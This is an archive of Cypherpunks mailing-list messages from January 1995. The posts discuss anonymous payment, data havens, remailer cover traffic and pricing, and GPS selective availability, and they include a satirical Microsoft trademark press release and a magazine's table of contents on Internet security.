> > some account id which would last the lifetime of the balance and then
> > disappear.
> 
> This is EXACTLY what I was contemplating. I really wish they would
> implement it. Then I can get the traveler's cheques out of my wallet.
> (unsigned in both spots of, course.)

Is this not essentially the same as the current pre-paid long distance
Phone cards on the market?

One would think the transition as easy for the credit card companies to 
make with a secured, disposable visa card.


> 
> - --
> ==============================================================================
> skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
>                                        | a listing of crypto related files
> PGP encrypted mail is accepted and     | available on my auto-responder.
> preferred.                             | (Yes...the faqs are there!)
>                                        |
> E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
> Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
> ==============================================================================
>                  Be careful when playing under the anvil tree.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBLxCfB8lnXxBRSgfNAQH6yAf/RMSqUXOHouTE3qKqaU/naHO8fdr8cEKL
> EjAemhDQj5yVHeTz4YCT1p16CW8X+++fTXGsfZoCr7c+xxYoj/04OVC/u3UPvpJy
> kAtwhbZhIG7ndKk2weoxZLTnxl5TVlkYjZUrufSccUw0ZfA6h27WrZNV7jFV89dk
> c2xPr9oJ8dj/jwJtaNIR2KtTc9THWyxlGEIBzMn4mA1VeFz0I27uPK9RSs0M4eXb
> JCW/ns92Gzwslq0/3n7d4JctGXar+9cUTjowPYRXinKX7wsyoKj5nN7HrCo8D5ot
> W0KCfDzkn2YOGCj1CzkRkcW0wiGXI9kBXpCQVXJFlKZ6r7d5QnN0AA==
> =B73o
> -----END PGP SIGNATURE-----
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Wed, 11 Jan 95 11:55:59 PST
To: cypherpunks@toad.com
Subject: Getting on the list
Message-ID: <199501111955.LAA29153@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I've been trying to get back on the Cypherpunks list now for over 3 weeks.
IS anyone out there on the list that has the power to get me added.   I
tried
the usual request to cypherpunks-request@toad.com,   but haven't been
sucessful.

Who is maintaining the list these days?   Does it still exist?  And
why haven't any of my requests been hohored?
thats honored...

Thanx
John D.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 08:56:21 PST
To: wcs@anchor.ho.att.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950111114558.11283A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995 wcs@anchor.ho.att.com wrote:

> Date: Sun, 8 Jan 95 23:48:36 EST
> From: wcs@anchor.ho.att.com
> To: dfloyd@io.com
> Cc: cypherpunks@toad.com
> Subject: Re: Data Haven problems
> 
> dfloyd asks for ideas about preventing spamming in data havens,
> for the code that he's working on.  It's a hard job.
> A related problem is how to prevent your data haven from becoming
> the porno-ftp site of the week, and either being swamped with
> traffic or raided by the Post Office Reactionary Neighborhood Police.
> 

[Problems of payment schemes and lack of anonymous payment infastructure 
deleted]

> Some operators may find it useful to limit the amount of data
> that can be stored or retrieved by a specific user or site, 
> though this is less useful with anonymous and pseudonymous remailers
> around, since "a specific user" becomes vaguer.
> 
> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.  Namespace control in general is an issue -
> do users get to choose filenames, or list directories, or do they
> have to know the names of files to retrieve. 
> Another issue is whether files can only be retrieved by the sender -
> probably a local policy issue.  

To some degree this requires the evaluation of the "authority attention" 
level the data haven has achieved.  If the real sensitive data is more 
extreme than a porn deposit, (I assume we are talking 'legal' and not 
kiddie porn BTW) then the spam involved will serve to properly mask, to 
some degree, stego'd files within the porn.  Part of a data haven, it 
seems to me, will be security by obscurity.  Just on the basic level that 
a haven with all encrypted files will be somewhat secure by obscure, in 
that the authority most likely to be interested in the data probably will 
not be attentive.  A repository holding some legitimate spam, be it porn 
or gifs or whatever, is unlikely to attract the level of SERIOUS 
attention that the sensitive data it contains may warrant.

To sum:  Spam's usefullness is a function of current authority attention, 
likely authority attention and authority attention the sensitive data 
warrants.

 
> Some sites may only accept encrypted files, which reduces the spam 
> potential considerably, as well as reducing your exposure to the
> porn police, though it's difficult to do anything about files that are
> encrypted with a public key whose private key has been posted to the net,
> or fake crypto headers in an otherwise unencrypted file,
> unless you put in lots more code to check the insides of files and
> watch the net for such postings, which is unrealistic.  There's also
> the problem that PGP and especially RIPEM files are non-stealthy,
> and users may not want to leave even keyids in their files.

A better policy might be to encrypt all files that are not encypted, 
perhaps through some key assignment system.  The spam thus adds to the 
total traffic analysis problem, and the security of the spam is not 
material.  i.e. better encrypted spam than plaintext spam.

> 		Bill
> 

-uni- (Dark)
0

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 09:17:08 PST
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Data Haven problems
In-Reply-To: <ZwQ4lyczBSQA075yn@netcom.com>
Message-ID: <Pine.SUN.3.91.950111121303.11283F-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Alan Bostick wrote:

> Date: Mon, 09 Jan 1995 13:46:11 -0800
> From: Alan Bostick <abostick@netcom.com>
> To: wcs@anchor.ho.att.com, dfloyd@io.com
> Cc: cypherpunks@toad.com
> Subject: Re: Data Haven problems
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <9501090448.AA14477@anchor.ho.att.com>, you wrote:
> 
> > Filtering by filename and type can also be useful - if you don't allow
> > files named *.gif and *.jpg, users may be less likely to
> > spam you with pornography.  Namespace control in general is an issue -
> > do users get to choose filenames, or list directories, or do they
> > have to know the names of files to retrieve. 
> > Another issue is whether files can only be retrieved by the sender -
> > probably a local policy issue.  
> 
> Pornographic images aren't spam _per_se._ What makes them troublesome is
> the huge number of people who wish to download them when their
> availability is widely known.  (My ISP's ftp site is being bogged down
> by lots of accesses; it is speculated that these are people trying to
> access pornography kept there.)

In many ways this shows how publically available porn could just pummel 
traffic analysis.

> 
> The obvious fix here is the same as the proposed fix for remailer
> spamming:  charge for access.
> 
> As a (presumably) fixed-location data haven, one would want to be able
> to use some kind of anonymous e-money for payment, but one could also
> use good, old-fashioned credit card numbers, too.
> 
> The feelthy peexture business might well be the cash cow that keeps a
> data-haven/fortress remailer afloat (if that's not too mixed a metaphor).
> 
>                           | PROOF-READER, n: A malefactor who atones for
>    Alan Bostick           | making your writing nonsense by permitting
>    abostick@netcom.com    | the compositor to make it unintelligible.
> finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
> Key fingerprint:          | 
> 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.1
> 
> iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg
> tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z
> +FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A
> =gvPB
> -----END PGP SIGNATURE-----
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Wed, 11 Jan 95 12:23:53 PST
To: cypherpunks@toad.com
Subject: Microsoft TrueName(tm)
Message-ID: <199501112023.MAA19659@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


brat@apple.com found this somewhere....   strick



Microsoft Clarifies Trademark Policies

REDMOND, Washington--January 4, 1995--In response to customer
inquiries, Microsoft today clarified the naming policy for Bob(tm), its
new software product designed for computer beginners.  Contrary to
rumors, Microsoft will not demand that all persons formerly named "Bob"
immediately select new first names.

    "I don't know where these rumors come from," commented Steve
Balmer, Microsoft Executive Vice President for Worldwide Sales and
Support.  "It's ridiculous to think Microsoft would force people
outside the computer industry to change their names.  We won't, and our
licensing policies for people within the industry will be so reasonable
that the Justice Department could never question them."

    Balmer said employees of other computer companies will be given the
opportunity to select new names, and will also be offered a licensing
option allowing them to continue using their former names at very low
cost.

    The new licensing program, called Microsoft TrueName(tm), offers
persons who want to continue being known by the name Bob the option of
doing so, with the payment of a small monthly licensing fee and upon
signing a release form promising never to use OpenDoc.  As an added
bonus, Bob name licensees will also be authorized to display the
Windows 95 logo on their bodies.

    Persons choosing not to license the Bob name will be given a 60-day
grace period during which they can select another related name.  "We're
being very lenient in our enforcement of the Bob trademark," said Bill
Newkom, Microsoft's Senior Vice President of Law and Corporate
Affairs.  "People are still free to call themselves Robert, Robby, or
even Rob.  Bobby however is derivative of Microsoft's trademark and
obviously can't be allowed."

    Microsoft also announced today that Bob(tm) Harbold, its Executive
Vice President and Chief Operating Officer, has become the first
Microsoft TrueName licensee and will have the Windows 95 logo tattooed
to his forehead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Wed, 11 Jan 95 09:23:34 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501111727.MAA11495@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> The call up could possibly be related to the repatriacion of the Hatian
> boat people or even a continued presence in Hatii. I think Atistede still

This past week we had a number of personnel sent to Haiti for the next 6
months.  

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxQU5yoZzwIn1bdtAQFVCQF/eZvusPABHtYtkIMm/q/AADIcaJtZ1Fna
m202XMn6gdjl0j0SQAx9TEW9bt+pOxW+
=OzIN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 11 Jan 95 10:59:24 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com>
Message-ID: <199501111859.AA02457@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Not relevant to cypherpunks-- just call me Carol Anne--

If I were the DOD, I would set the standard GPS default to selective
availability. After all, with SA on military receivers can still get
fine positioning data. If someone could come up with a good reason to
turn SA off, great, but I wouldn't leave it on otherwise.

The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
to mind, especially vis-a-vis the North Koreans. They probably don't
have accurate IRBMs but they certainly could cobble together a
Learjet-based delivery system.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxQqpafb4pLe9tolAQGMfAP/WeMcDorjNsko7Qcvb34lPdg30/IHSJNV
FoG2DOjwyBJhopHeeEpzzm629U2y7jM5+ipoTNl6DLh5tjJ3gQVfi0Lz6b/iyL+j
iXH4F15Hws55g07ZRQ9r+JGTL33mP5G1RAg/dfeXixvS2uXTWSknF37tQdVZFpzA
2USM2cnEsPU=
=71jL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Wed, 11 Jan 95 06:33:03 PST
To: cypherpunks@toad.com
Subject: privacy digest
Message-ID: <9501111321.AA25946@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I am extremely sympathetic to the anti-abortion cause but the kind of abuse
described in this item is unnerving.  Although illegal and reprehensible, it is
one thing for a government official, because of some strong conviction, to
violate the law.  It is completely another to violate it for money.  Men, if
they were men, who did this should have their privacies cut off.


Subject:    Computer Privacy Digest V6#003

Computer Privacy Digest Sat, 07 Jan 95              Volume 6 : Issue: 003

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Wed, 11 Jan 95 10:42:15 PST
To: cypherpunks@toad.com
Subject: anti clipper graffiti
Message-ID: <199501111841.NAA09940@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



check out:

	<http://wps.com/anti-clipper-graffiti.gif>

and while you've got mosaic going, check this out on the same server:

	<http://wps.com/toilet/toilet.html>

-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 11 Jan 95 04:46:29 PST
To: cypherpunks@toad.com
Subject: TCM on BBC
In-Reply-To: <ab3820b50302100417b7@DialupEudora>
Message-ID: <Pine.HPP.3.91.950111134030.6425A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> (I'll be travelling to LA on Friday, for
> a television interview with the BBC on
> crypto, and so will be unwired that day.)

Please announce the date and time of the broadcast
(if they tell you).

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Wed, 11 Jan 95 15:10:45 PST
To: cypherpunks@toad.com
Subject: Remailer traffic loads?
Message-ID: <Chameleon.4.01.950111151026.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Is there someplace that remailer operators routinely post information
about traffic load?

The reason I ask is that this issue can have a bearing on selection of
remailers for chaining.  Using Raph's list, one can gather an approximate
feel for latency and reliability, but there is no way to know if a
site is forwarding hundreds or thousands of messages a day (which would be
good for traffic analysis), or just a few tens (which makes in/out analysis
much easier.)

Raph's list is a good 'reputation' system; however, it lacks this one bit
of info which would be immensely helpful.  Periodic postings of remailer
frequency usage to alt.privacy.anon-server by the operators would be one
way to propagate this info.

Of course, I may be overlooking something basic:  Would posting this info
pose any kind of security weakness?  I imagine not; if someone wants to get
this info for traffic analysis, they just watch the remailer for a day or
so.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxRlJU1Diok8GKihAQHdJgP+IlVlKRkCbZQCjr9VgEgWLt0dY2jP4s5k
WcRkpBHXnFxV2nkM2zF9L/UMf1hKkfcdqZj5FuLWLUE48pPvfZuhRebMq8BBay6R
5k0PiA095561uJb6T1mIwm+Tb3x/KZ/ZCMceoe5SA2lu8b6vmh+QdS/ZOc1aFsIj
rhrquyzeCZs=
=yjPJ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 11:59:43 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <WHw4lKjqRq69077yn@mirage.skypoint.com>
Message-ID: <199501112004.PAA12969@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Samuel Kaplin <skaplin@mirage.skypoint.com> wrote:
>Perhaps it is two unrelated events. Maybe the Russians are using GPS in
>their attack on Chechnya, and the administration decided "Not on our dime."

To clarify a little bit:  I summarized wrongly.  The GPS fine location has
not been turned off, the dithering has been turned off.  In essence,
the GPS fine positioning usually lies in a particular algorithmic way
designed to make determining exact locations extrememly difficult.

In theory, the military GPS units bypass this dithering.  Either it doesn't
work or there aren't enough military units (I believe the latter is the
official story), but GPS fine positioning has been turned off during times
like the Iraq massacre and the Haiti invasion so that the military can
use civilian units.

In any case, it turns out that the Green Beret in question is being sent
to Haiti.  It doesn't explain the GPS, tho.  There's lots-o-speculation
elsewhere on the net.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxP++hNhgovrPB7dAQGUowQAgvqyOzrVxCWnumcPQyPbrWnuxn+017Wf
DBM/A5VCqyzj/wpZYgBydBwZknzEYd8vxLdt32j2rlhzswHCHdsvECuN7aer9S7t
69ZlrtPn1UKy5MvTUyAdvxh5Z8Zex1eenyYd8q+favmrAB9UmX4Sh1e4JkYqPRmP
is2vZ8DgAIQ=
=Lmyl
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxQ5wCoZzwIn1bdtAQGWPgGAwLlWR8brXeavxwrV4CxvCK1XMZgCY8pq
MixVBWLp0eti/cbmDzSS/8x9gle8PUgL
=VtmS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 11 Jan 95 15:37:16 PST
To: cypherpunks@toad.com
Subject: Re:  Storm Signals
Message-ID: <199501112337.PAA20199@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > > 		6 months of active service.  He was not told where he'd be.
> > > Perhaps Bosnia?
> > 
> > I doubt it. [...]
> > 
> 
> Military action also requires political will, and with the recent change
> in power in the US govt there is no way anything is going to happen for at
> least six months.  Freshmen congressmen do not sign off on a war the first


True.  But clandestine operations don't require the approval of 
Congress.  In fact, the prez never has to admit they exist.  Ever.  Read 
the Pentagon Papers.

-Rat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Wed, 11 Jan 95 16:05:01 PST
To: cypherpunks@toad.com
Subject: Remailing pricing and cover traffic
Message-ID: <199501120004.QAA24479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



We have been debating payment systems for remailers under the
following assumptions:

a) Reliable remailers will have to justify professional management
by making money for their owners.

b) End-of-chain remailers will need to make money to cover for
their legal expenses.

c) Payment would limit abuse.

I already countered the last point. Let me try to deal with the first
two to conclude that many professionally run remailers may very well
stay free or close to that for a long time:

Remailers are only one of many kinds of businesses that have been
described on this list. Others will include reputation markets,
near-traditional banking systems, stamp issuers, certification
agencies, data havens etc... But we have also seen that nearly all
other forms of businesses already now cannot but run afoul of a
tentacular law at some time or other. We have concluded that many of
these businesses would migrate to cypherspace, hiding their locations,
owners, books, assets and other information too dangerous to keep in
the open.

Each such organisation will generate lots of traffic, in part under
control of whoever is trying to do business with it. So they are
potentially easily traceable and subject to legal or violent
consequences.  A possible solution is of course for their sites to be
remailers too. Lots of non-descript remailers, trading lots of
encrypted traffic, a lot of it remailer management info and bogus
filler traffic.  When you are one of many, and people correspond with
you only through limited traffic anonymous response blocks, then the
remailers help you stay hidden by providing cover traffic.

But for this to work you must consistently attract a lot of cover
traffic through your remailer(s). If others undercut your stamp price,
or best your reliability status, you are in trouble because traffic
will migrate to other more competitive remailers, and you will be left
dry on the sand with the task to generate believable cover traffic
yourself. You are also competing with the cypherspace customers hiding
their own personal traffic under cover of "everyone-a-remailer"
remailers.

It may well be much simpler for cypherbusinesses to stay competitive on
the "middle" remailer market, even at a loss, and to transmit volumes of
believable (because real) cover traffic. End-of-chain (or more
precisely "clear-text") remailers can be expected to be a minority as,
after all, they are only needed to post to public forums. Maybe these
will charge a fee. For the others, the most and biggest "porn GIFs" go
through (even for free), the better...

However, large free remailers may then arise suspicion: There is little
reason to run a heavy traffic remailer for free, apart from getting
cover traffic. Competition may then settle at a small price, far from
enough to keep the remailer running, but enough to not be too
conspicuous. Or better, non-profit remailers may become ubiquitous,
being used in part to provide cover traffic and in part to transfer
money from the cypherspace businesses to cover for the cost of the
computers and obvious living expenses.

Between cypherbusinesses, everyone-a-remailer operations, and a few
real non-profits, most remailing may stay close to free for a long
time.  Untraceable money will be useful for all kinds of things, but
maybe not so much for remailing.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 14:29:28 PST
To: Syed Yusuf <cypherpunks@toad.com>
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>
Message-ID: <WO55lKjqRey2077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>, you wrote:

I hope they took you someplace nice for lunch...You might want to file a
FOI request on yourself, just to see how much they censor. ;) They might
think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
            A man wrapped up in himself makes a very small package.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxRaHMlnXxBRSgfNAQFuLgf+LPBCnBDKslirz/peeuedKN5pgDO8sZTJ
B30eQqhv+qEKz+jBoRD/V0Hu9NyRdzk/R1QnlwRSVcBzS1G+/Eq+mF6P7KumurO4
QqlGH3wyNHoXTvlPuAnEiF14MTupGYeKcdvO/X4I+NE+GxAKa1V3l0L9fgO5wvnb
UCWkKOYbaet366xyjRIuN7LpAuYHS7RGr1E7eKbUDz5D/gAddBDdniz9k4xMaNnT
OT4Y0lujZO3J/NftqUJaGauKwVrbLLJy7DWdi9p0sqqsQFeFt5owmCPnKq1vEH2c
SF7dlG/8IiJVPpSbZXiSerhOSm8OnHtqA1Ga4UYfzj5P2yrrGJHsZg==
=eiFH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 14:32:29 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <WHw4lKjqRq69077yn@mirage.skypoint.com>
Message-ID: <aa55lKjqR8T4077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501112004.PAA12969@bb.hks.net>, you wrote:

> to Haiti.  It doesn't explain the GPS, tho.  There's lots-o-speculation
> elsewhere on the net.

I wonder if this might be a response to the recent Korean downing of one of
our choppers. Hand them all a civilian GPS and say "DON'T GET LOST!!!"

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                       Back off man, We're scientists!!!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxRaOslnXxBRSgfNAQG6Rwf+I8nRZ0JOS+UO+hVxTizWTX2AwlQok0vl
54Eqzact3HgyM6k8jC4yrAMNha042F7lxIBPjGvI8nWpKWCwvhV4WiK2+yvlYRrT
2ifJ/yrXhTzD/x27+VbPjpD2CyM2JfSYAb1U6RxMzmGa3FCC/dlNupQz6Gn8JebP
Dxg3TLAzL8aZnq2vDcEBqL96/RQIY/l4ZP7fDG/on/QR5UaPr1s/kz0at0lnMIaq
eSy14LpLH5oQYsI7sAfJy+Fh9Zdq0qtvFgnekFB73YZ/IGMiN8UuKVqUG35ExVcT
2qI3zhYjbyH6THNC2l8QkNlU/qSvErUUm2rvgYYZFHPSzf0uKwoZhw==
=+uKC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 11 Jan 95 13:49:06 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Storm Signals
In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com>
Message-ID: <9501112147.AA00447@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



	Tim May writes:

> 
> This might explain the few thousand Green Berets being sent, if this
> is so. About the GPS, I have nok idea, though it seems plausible.
> 

	According to a couple of friends who are evaluating use of GPS
for precisely locating radio transmissions the usual selective availablity
dither is still turned on and there have been no public announcements
about any changes in the status of the C/A (public) part of the system.
The P code part of the system is only available to the military and
announcements about it may not be made from the usual USCG BBS that
carries stuff about the civilian signals, but they know nothing about
any change in GPS status recently, nor has there been any change
in the amount of dither or its (random) nature.

							Dave Emery






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Wed, 11 Jan 95 09:32:36 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <199501102230.RAA01492@bb.hks.net>
Message-ID: <Pine.SUN.3.90.950111172637.12520C-100000@vulcan.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, L. Todd Masco wrote:
 
> L. McCarthy noted that I didn't include sapphire,

...talking of which, is sapphire available outside of the USA?  I'd quite
like to have a look at it.

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 14:41:28 PST
To: cypherpunks@toad.com
Subject: Internet World on Net Security
Message-ID: <199501112240.RAA11895@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The entire issue of Internet World of February, 1995, is about Internet
security, digital cash, encryption, firewalls and more.  Here's the
contents: 
 
   Internet World 
   February, 1995 
   Volume 6 Number 2 
 
   Contents 
 
   BETTER SAFE 
   Danger lurks on the Info Highway. You must take precautions 
   to reduce your risk. 
 
   By Dave Taylor and Rosalind Resnick 
 
 
   GETTING CRYPTIC 
   Phil Zimmermann's PGP gives you powerful encryption to keep 
   your messages safe from prying eyes. Read all about it. 
 
   By William Stallings 
 
 
   SECURING THE ENTERPRISE 
   Connecting your corporation to the Internet can be a 
   security nightmare. Firewalls are the main line of defense. 
 
   By Alton Hoover  
 
 
   BEYOND THE FIREWALL 
   The latest firewall technology not only detects intruders, 
   but strikes back. 
 
   By Winn Schwartau 
 
 
   CASHING IN 
   As Internet commerce expands, a host of companies are vying 
   to establish their systems as the basis for cyberbanking 
   and credit-card transactions. 
 
   By Lisa Morgan 
 
 
   BUSINESS BROWSER 
   New versions of Mosaic with built-in encryption promise to 
   keep your transactions safe. 
 
   By Richard W. Wiggins 
 
 
   UNLAWFUL ENTRY 
   Crackers can feast on your data if you fail to plug your 
   leaky Unix system. 
 
   By Aaron Weiss 
 
 
   IT'S ALIVE! 
   Although the furor has subsided, reports of Clipper's death 
   are greatly exaggerated. The government's controversial 
   eavesdropping effort lives on. 
 
   By Steven Vaughan-Nichols 
 
 
   BUILDING TRUST 
   The chief executives of Trusted Information Systems - Steve 
   Crocker and Steve Walker - talk about encryption, 
   CyberCash, Clipper, and more. 
 
   By Jeff Ubois 
 
   ------ 
 
   On another topic, Mike Godwin's column, Law of the Net, 
   deals with "Free Speech vs. Sex Discrimination Online." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 14:44:36 PST
To: cypherpunks@toad.com
Subject: Mastercard Online
Message-ID: <199501112244.RAA12115@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 10, 1995, D2. 
 
 
